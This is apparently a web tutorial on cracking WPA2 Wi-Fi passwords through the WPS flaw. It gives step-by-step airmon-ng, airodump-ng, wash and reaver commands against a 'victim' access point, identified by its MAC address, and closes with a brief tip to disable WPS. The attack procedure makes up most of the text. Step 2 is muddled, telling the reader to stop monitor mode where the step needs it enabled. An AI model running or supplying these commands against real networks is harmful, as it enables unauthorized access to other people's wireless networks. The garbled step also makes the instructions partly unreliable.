What is WPA2?
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP.
A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wifi Protected Setup enabled by default (even after we hard reset the access point).
Requirements:
1. Wireless card (support promiscuous mode).
- You can Buy it From Amazon {Click Here} In this Tutorial I used (ALFA AWUS036H).
2. Access Point with WPA2 and WPS enables.
Steps for Hacking Wi-Fi – Cracking WPA2 Password:
1. Open a terminal (CTRL+ALT+T) and type "airmon-ng".
- This Command will Lists Wireless Card that is attached with System.
2. The Next Step is to Stop Wireless Monitor Mode by running "airmon-ng stop wlan0".
3. To capture the Wireless Traffic run "airodump-ng wlan0". Wireless Interface will Start Capturing the Data.
- From the above Picture, We can see many Available Wi-Fi Networks with all the Information. The Green Box is our Victim Wi-Fi Network.
Information:
- BSSID (Basic Service Set Identification): MAC address of Wi-Fi Network.
- PWR: Signal level Reported by the Card.
- Beacons: Number of Announcements Packets sent by the AP.
- #Data: Number of Captured Data Packets, Including Data Broadcast Packets.
- #/s: Number of Data Packets Per second Measure over the last 10 seconds.
- CH: Channel Number (Taken from Beacon Packets).
- MB: Maximum Speed supported by the AP.
If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and Higher rates are 802.11g.
- ENC: Encryption Algorithm in use.
- CIPHER: The Cipher Detected.
TKIP is Typically used with WPA and CCMP is Typically used with WPA2.
- AUTH: The Authentication Protocol used.
- ESSID: Shows the Wireless Network Name so-called “SSID”, which can be empty if SSID hiding is activated.
4. From Step 3, We can Find Wi-Fi Network with Encryption Algorithm WPA2 and note the AP Channel Number. Now, We will Find out Whether Target AP has WPS enabled or not.
- By Running "wash -i wlan0 -c 8 -C -s".
- if WPS Locked, Status is No
5. The Last Step is Cracking the WPA2 Password using Reaver:
"reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360"
- By Running Command "reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360".
Success!! Wi-Fi is Hacked.
Conclusions:
1. WPA and WPA2 Security Implemented without using the Wi-Fi Protected Setup (WPS) Feature are Unaffected by the Security Vulnerability.
2. To Prevent this attack, Turn off your WPS/QSS Feature on your Wi-Fi Network.
Facebook
Twitter
Whatsapp
Fb Share